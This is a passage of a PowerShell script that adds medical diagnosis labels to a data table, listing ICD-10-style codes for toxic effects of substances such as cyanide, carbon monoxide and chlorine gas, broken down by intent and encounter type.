subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of phosphorus and its compounds, accidental (unintentional)","Toxic effect of phosphorus and its compounds, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of phosphorus and its compounds, intentional self-harm","Toxic effect of phosphorus and its compounds, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of phosphorus and its compounds, intentional self-harm","Toxic effect of phosphorus and its compounds, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of phosphorus and its compounds, intentional self-harm","Toxic effect of phosphorus and its compounds, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of phosphorus and its compounds, assault","Toxic effect of phosphorus and its compounds, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of phosphorus and its compounds, assault","Toxic effect of phosphorus and its compounds, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of phosphorus and its compounds, assault","Toxic effect of phosphorus and its compounds, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of phosphorus and its compounds, undetermined","Toxic effect of phosphorus and its compounds, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of phosphorus and its compounds, undetermined","Toxic effect of phosphorus and its compounds, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of phosphorus and its compounds, undetermined","Toxic effect of phosphorus and its compounds, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of manganese and its compounds, accidental (unintentional)","Toxic effect of manganese and its compounds, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of manganese and its compounds, accidental (unintentional)","Toxic effect of manganese and its compounds, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of manganese and its compounds, accidental (unintentional)","Toxic effect of manganese and its compounds, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of manganese and its compounds, intentional self-harm","Toxic effect of manganese and its compounds, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of manganese and its compounds, intentional self-harm","Toxic effect of manganese and its compounds, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of manganese and its compounds, intentional self-harm","Toxic effect of manganese and its compounds, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of manganese and its compounds, assault","Toxic effect of manganese and its compounds, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of manganese and its compounds, assault","Toxic effect of manganese and its compounds, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of manganese and its compounds, assault","Toxic effect of manganese and its compounds, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of manganese and its compounds, undetermined","Toxic effect of manganese and its compounds, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of manganese and its compounds, undetermined","Toxic effect of manganese and its compounds, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of manganese and its compounds, undetermined","Toxic effect of manganese and its compounds, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of hydrogen cyanide, accidental (unintentional)","Toxic effect of hydrogen cyanide, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of hydrogen cyanide, accidental (unintentional)","Toxic effect of hydrogen cyanide, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of hydrogen cyanide, accidental (unintentional)","Toxic effect of hydrogen cyanide, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of hydrogen cyanide, intentional self-harm","Toxic effect of hydrogen cyanide, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of hydrogen cyanide, intentional self-harm","Toxic effect of hydrogen cyanide, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of hydrogen cyanide, intentional self-harm","Toxic effect of hydrogen cyanide, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of hydrogen cyanide, assault","Toxic effect of hydrogen cyanide, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of hydrogen cyanide, assault","Toxic effect of hydrogen cyanide, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of hydrogen cyanide, assault","Toxic effect of hydrogen cyanide, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of hydrogen cyanide, undetermined","Toxic effect of hydrogen cyanide, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of hydrogen cyanide, undetermined","Toxic effect of hydrogen cyanide, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of hydrogen cyanide, undetermined","Toxic effect of hydrogen cyanide, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified inorganic substances, accidental (unintentional)","Toxic effect of other specified inorganic substances, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified inorganic substances, accidental (unintentional)","Toxic effect of other specified inorganic substances, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified inorganic substances, accidental (unintentional)","Toxic effect of other specified inorganic substances, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified inorganic substances, intentional self-harm","Toxic effect of other specified inorganic substances, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified inorganic substances, intentional self-harm","Toxic effect of other specified inorganic substances, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified inorganic substances, intentional self-harm","Toxic effect of other specified inorganic substances, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified inorganic substances, assault","Toxic effect of other specified inorganic substances, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified inorganic substances, assault","Toxic effect of other specified inorganic substances, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified inorganic substances, assault","Toxic effect of other specified inorganic substances, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified inorganic substances, undetermined","Toxic effect of other specified inorganic substances, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified inorganic substances, undetermined","Toxic effect of other specified inorganic substances, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified inorganic substances, undetermined","Toxic effect of other specified inorganic substances, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified inorganic substance, accidental (unintentional)","Toxic effect of unspecified inorganic substance, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified inorganic substance, accidental (unintentional)","Toxic effect of unspecified inorganic substance, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified inorganic substance, accidental (unintentional)","Toxic effect of unspecified inorganic substance, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified inorganic substance, intentional self-harm","Toxic effect of unspecified inorganic substance, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified inorganic substance, intentional self-harm","Toxic effect of unspecified inorganic substance, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified inorganic substance, intentional self-harm","Toxic effect of unspecified inorganic substance, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified inorganic substance, assault","Toxic effect of unspecified inorganic substance, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified inorganic substance, assault","Toxic effect of unspecified inorganic substance, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified inorganic substance, assault","Toxic effect of unspecified inorganic substance, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified inorganic substance, undetermined","Toxic effect of unspecified inorganic substance, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified inorganic substance, undetermined","Toxic effect of unspecified inorganic substance, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified inorganic substance, undetermined","Toxic effect of unspecified inorganic substance, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from motor vehicle exhaust, accidental (unintentional)","Toxic effect of carbon monoxide from motor vehicle exhaust, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from motor vehicle exhaust, accidental (unintentional)","Toxic effect of carbon monoxide from motor vehicle exhaust, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from motor vehicle exhaust, accidental (unintentional)","Toxic effect of carbon monoxide from motor vehicle exhaust, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from motor vehicle exhaust, intentional self-harm","Toxic effect of carbon monoxide from motor vehicle exhaust, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from motor vehicle exhaust, intentional self-harm","Toxic effect of carbon monoxide from motor vehicle exhaust, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from motor vehicle exhaust, intentional self-harm","Toxic effect of carbon monoxide from motor vehicle exhaust, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from motor vehicle exhaust, assault","Toxic effect of carbon monoxide from motor vehicle exhaust, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from motor vehicle exhaust, assault","Toxic effect of carbon monoxide from motor vehicle exhaust, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from motor vehicle exhaust, assault","Toxic effect of carbon monoxide from motor vehicle exhaust, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from motor vehicle exhaust, undetermined","Toxic effect of carbon monoxide from motor vehicle exhaust, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from motor vehicle exhaust, undetermined","Toxic effect of carbon monoxide from motor vehicle exhaust, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from motor vehicle exhaust, undetermined","Toxic effect of carbon monoxide from motor vehicle exhaust, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from utility gas, accidental (unintentional)","Toxic effect of carbon monoxide from utility gas, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from utility gas, accidental (unintentional)","Toxic effect of carbon monoxide from utility gas, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from utility gas, accidental (unintentional)","Toxic effect of carbon monoxide from utility gas, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from utility gas, intentional self-harm","Toxic effect of carbon monoxide from utility gas, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from utility gas, intentional self-harm","Toxic effect of carbon monoxide from utility gas, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from utility gas, intentional self-harm","Toxic effect of carbon monoxide from utility gas, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from utility gas, assault","Toxic effect of carbon monoxide from utility gas, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from utility gas, assault","Toxic effect of carbon monoxide from utility gas, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from utility gas, assault","Toxic effect of carbon monoxide from utility gas, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from utility gas, undetermined","Toxic effect of carbon monoxide from utility gas, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from utility gas, undetermined","Toxic effect of carbon monoxide from utility gas, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from utility gas, undetermined","Toxic effect of carbon monoxide from utility gas, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from incomplete combustion of other domestic fuels, accidental (unintentional)","Toxic effect of carbon monoxide from incomplete combustion of other domestic fuels, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from incomplete combustion of other domestic fuels, accidental (unintentional)","Toxic effect of carbon monoxide from incomplete combustion of other domestic fuels, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from incomplete combustion of other domestic fuels, accidental (unintentional)","Toxic effect of carbon monoxide from incomplete combustion of other domestic fuels, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from incomplete combustion of other domestic fuels, intentional self-harm","Toxic effect of carbon monoxide from incomplete combustion of other domestic fuels, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from incomplete combustion of other domestic fuels, intentional self-harm","Toxic effect of carbon monoxide from incomplete combustion of other domestic fuels, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from incomplete combustion of other domestic fuels, intentional self-harm","Toxic effect of carbon monoxide from incomplete combustion of other domestic fuels, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from incomplete combustion of other domestic fuels, assault","Toxic effect of carbon monoxide from incomplete combustion of other domestic fuels, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from incomplete combustion of other domestic fuels, assault","Toxic effect of carbon monoxide from incomplete combustion of other domestic fuels, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from incomplete combustion of other domestic fuels, assault","Toxic effect of carbon monoxide from incomplete combustion of other domestic fuels, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from incomplete combustion of other domestic fuels, undetermined","Toxic effect of carbon monoxide from incomplete combustion of other domestic fuels, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from incomplete combustion of other domestic fuels, undetermined","Toxic effect of carbon monoxide from incomplete combustion of other domestic fuels, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from incomplete combustion of other domestic fuels, undetermined","Toxic effect of carbon monoxide from incomplete combustion of other domestic fuels, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from other source, accidental (unintentional)","Toxic effect of carbon monoxide from other source, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from other source, accidental (unintentional)","Toxic effect of carbon monoxide from other source, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from other source, accidental (unintentional)","Toxic effect of carbon monoxide from other source, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from other source, intentional self-harm","Toxic effect of carbon monoxide from other source, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from other source, intentional self-harm","Toxic effect of carbon monoxide from other source, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from other source, intentional self-harm","Toxic effect of carbon monoxide from other source, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from other source, assault","Toxic effect of carbon monoxide from other source, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from other source, assault","Toxic effect of carbon monoxide from other source, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from other source, assault","Toxic effect of carbon monoxide from other source, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from other source, undetermined","Toxic effect of carbon monoxide from other source, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from other source, undetermined","Toxic effect of carbon monoxide from other source, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from other source, undetermined","Toxic effect of carbon monoxide from other source, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from unspecified source, accidental (unintentional)","Toxic effect of carbon monoxide from unspecified source, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from unspecified source, accidental (unintentional)","Toxic effect of carbon monoxide from unspecified source, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from unspecified source, accidental (unintentional)","Toxic effect of carbon monoxide from unspecified source, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from unspecified source, intentional self-harm","Toxic effect of carbon monoxide from unspecified source, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from unspecified source, intentional self-harm","Toxic effect of carbon monoxide from unspecified source, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from unspecified source, intentional self-harm","Toxic effect of carbon monoxide from unspecified source, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from unspecified source, assault","Toxic effect of carbon monoxide from unspecified source, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from unspecified source, assault","Toxic effect of carbon monoxide from unspecified source, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from unspecified source, assault","Toxic effect of carbon monoxide from unspecified source, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from unspecified source, undetermined","Toxic effect of carbon monoxide from unspecified source, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from unspecified source, undetermined","Toxic effect of carbon monoxide from unspecified source, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon monoxide from unspecified source, undetermined","Toxic effect of carbon monoxide from unspecified source, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitrogen oxides, accidental (unintentional)","Toxic effect of nitrogen oxides, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitrogen oxides, accidental (unintentional)","Toxic effect of nitrogen oxides, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitrogen oxides, accidental (unintentional)","Toxic effect of nitrogen oxides, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitrogen oxides, intentional self-harm","Toxic effect of nitrogen oxides, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitrogen oxides, intentional self-harm","Toxic effect of nitrogen oxides, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitrogen oxides, intentional self-harm","Toxic effect of nitrogen oxides, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitrogen oxides, assault","Toxic effect of nitrogen oxides, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitrogen oxides, assault","Toxic effect of nitrogen oxides, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitrogen oxides, assault","Toxic effect of nitrogen oxides, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitrogen oxides, undetermined","Toxic effect of nitrogen oxides, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitrogen oxides, undetermined","Toxic effect of nitrogen oxides, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitrogen oxides, undetermined","Toxic effect of nitrogen oxides, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of sulfur dioxide, accidental (unintentional)","Toxic effect of sulfur dioxide, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of sulfur dioxide, accidental (unintentional)","Toxic effect of sulfur dioxide, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of sulfur dioxide, accidental (unintentional)","Toxic effect of sulfur dioxide, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of sulfur dioxide, intentional self-harm","Toxic effect of sulfur dioxide, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of sulfur dioxide, intentional self-harm","Toxic effect of sulfur dioxide, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of sulfur dioxide, intentional self-harm","Toxic effect of sulfur dioxide, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of sulfur dioxide, assault","Toxic effect of sulfur dioxide, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of sulfur dioxide, assault","Toxic effect of sulfur dioxide, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of sulfur dioxide, assault","Toxic effect of sulfur dioxide, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of sulfur dioxide, undetermined","Toxic effect of sulfur dioxide, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of sulfur dioxide, undetermined","Toxic effect of sulfur dioxide, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of sulfur dioxide, undetermined","Toxic effect of sulfur dioxide, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of formaldehyde, accidental (unintentional)","Toxic effect of formaldehyde, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of formaldehyde, accidental (unintentional)","Toxic effect of formaldehyde, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of formaldehyde, accidental (unintentional)","Toxic effect of formaldehyde, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of formaldehyde, intentional self-harm","Toxic effect of formaldehyde, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of formaldehyde, intentional self-harm","Toxic effect of formaldehyde, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of formaldehyde, intentional self-harm","Toxic effect of formaldehyde, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of formaldehyde, assault","Toxic effect of formaldehyde, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of formaldehyde, assault","Toxic effect of formaldehyde, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of formaldehyde, assault","Toxic effect of formaldehyde, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of formaldehyde, undetermined","Toxic effect of formaldehyde, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of formaldehyde, undetermined","Toxic effect of formaldehyde, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of formaldehyde, undetermined","Toxic effect of formaldehyde, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of lacrimogenic gas, accidental (unintentional)","Toxic effect of lacrimogenic gas, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of lacrimogenic gas, accidental (unintentional)","Toxic effect of lacrimogenic gas, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of lacrimogenic gas, accidental (unintentional)","Toxic effect of lacrimogenic gas, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of lacrimogenic gas, intentional self-harm","Toxic effect of lacrimogenic gas, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of lacrimogenic gas, intentional self-harm","Toxic effect of lacrimogenic gas, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of lacrimogenic gas, intentional self-harm","Toxic effect of lacrimogenic gas, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of lacrimogenic gas, assault","Toxic effect of lacrimogenic gas, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of lacrimogenic gas, assault","Toxic effect of lacrimogenic gas, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of lacrimogenic gas, assault","Toxic effect of lacrimogenic gas, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of lacrimogenic gas, undetermined","Toxic effect of lacrimogenic gas, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of lacrimogenic gas, undetermined","Toxic effect of lacrimogenic gas, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of lacrimogenic gas, undetermined","Toxic effect of lacrimogenic gas, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of chlorine gas, accidental (unintentional)","Toxic effect of chlorine gas, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chlorine gas, accidental (unintentional)","Toxic effect of chlorine gas, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chlorine gas, accidental (unintentional)","Toxic effect of chlorine gas, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of chlorine gas, intentional self-harm","Toxic effect of chlorine gas, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chlorine gas, intentional self-harm","Toxic effect of chlorine gas, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chlorine gas, intentional self-harm","Toxic effect of chlorine gas, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of chlorine gas, assault","Toxic effect of chlorine gas, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chlorine gas, assault","Toxic effect of chlorine gas, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chlorine gas, assault","Toxic effect of chlorine gas, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of chlorine gas, undetermined","Toxic effect of chlorine gas, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chlorine gas, undetermined","Toxic effect of chlorine gas, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chlorine gas, undetermined","Toxic effect of chlorine gas, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of fluorine gas and hydrogen fluoride, accidental (unintentional)","Toxic effect of fluorine gas and hydrogen fluoride, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of fluorine gas and hydrogen fluoride, accidental (unintentional)","Toxic effect of fluorine gas and hydrogen fluoride, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of fluorine gas and hydrogen fluoride, accidental (unintentional)","Toxic effect of fluorine gas and hydrogen fluoride, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of fluorine gas and hydrogen fluoride, intentional self-harm","Toxic effect of fluorine gas and hydrogen fluoride, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of fluorine gas and hydrogen fluoride, intentional self-harm","Toxic effect of fluorine gas and hydrogen fluoride, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of fluorine gas and hydrogen fluoride, intentional self-harm","Toxic effect of fluorine gas and hydrogen fluoride, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of fluorine gas and hydrogen fluoride, assault","Toxic effect of fluorine gas and hydrogen fluoride, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of fluorine gas and hydrogen fluoride, assault","Toxic effect of fluorine gas and hydrogen fluoride, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of fluorine gas and hydrogen fluoride, assault","Toxic effect of fluorine gas and hydrogen fluoride, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of fluorine gas and hydrogen fluoride, undetermined","Toxic effect of fluorine gas and hydrogen fluoride, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of fluorine gas and hydrogen fluoride, undetermined","Toxic effect of fluorine gas and hydrogen fluoride, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of fluorine gas and hydrogen fluoride, undetermined","Toxic effect of fluorine gas and hydrogen fluoride, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of hydrogen sulfide, accidental (unintentional)","Toxic effect of hydrogen sulfide, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of hydrogen sulfide, accidental (unintentional)","Toxic effect of hydrogen sulfide, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of hydrogen sulfide, accidental (unintentional)","Toxic effect of hydrogen sulfide, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of hydrogen sulfide, intentional self-harm","Toxic effect of hydrogen sulfide, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of hydrogen sulfide, intentional self-harm","Toxic effect of hydrogen sulfide, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of hydrogen sulfide, intentional self-harm","Toxic effect of 